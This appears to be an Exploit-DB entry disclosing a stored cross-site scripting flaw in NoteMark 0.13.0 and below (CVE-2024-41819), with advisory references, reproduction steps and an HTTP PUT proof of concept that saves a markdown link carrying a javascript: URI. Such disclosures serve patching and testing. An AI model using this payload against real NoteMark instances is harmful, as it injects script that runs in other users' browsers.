32e0cc5e7f
5 changes to exploits/shellcodes/ghdb Gitea 1.22.0 - Stored XSS NoteMark < 0.13.0 - Stored XSS Invesalius3 - Remote Code Execution Windows TCP/IP - RCE Checker and Denial of Service
35 lines
No EOL
1.1 KiB
Text
35 lines
No EOL
1.1 KiB
Text
# Exploit Title: Stored XSS in NoteMark
|
|
# Date: 07/29/2024
|
|
# Exploit Author: Alessio Romano (sfoffo)
|
|
# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/
|
|
# Version: 0.13.0 and below
|
|
# Tested on: Linux
|
|
# References:
|
|
https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,
|
|
https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,
|
|
https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3
|
|
# CVE: CVE-2024-41819
|
|
|
|
## Steps to Reproduce
|
|
1. Log in to the application.
|
|
2. Create a new note or enter a previously created note.
|
|
3. Access the note editor functionality from the selected note by clicking
|
|
on the "Editor" tab.
|
|
4. Input the following payload:
|
|
[xss-link](javascript:alert(1))
|
|
5. Save the changes.
|
|
6. Click on the "Rendered" tab to view the rendered markdown version of the
|
|
note. Click on the previously created link to pop the injected alert.
|
|
|
|
## HTTP Request PoC
|
|
|
|
PUT /api/notes/<note-uuid>/content HTTP/1.1
|
|
Host: localhost:8000
|
|
Accept: */*
|
|
Content-Type: text/plain;charset=UTF-8
|
|
Content-Length: 34
|
|
Sec-Fetch-Site: same-origin
|
|
Authorization: Bearer <TOKEN>
|
|
|
|
|
|
[xss-link](javascript:alert(1)) |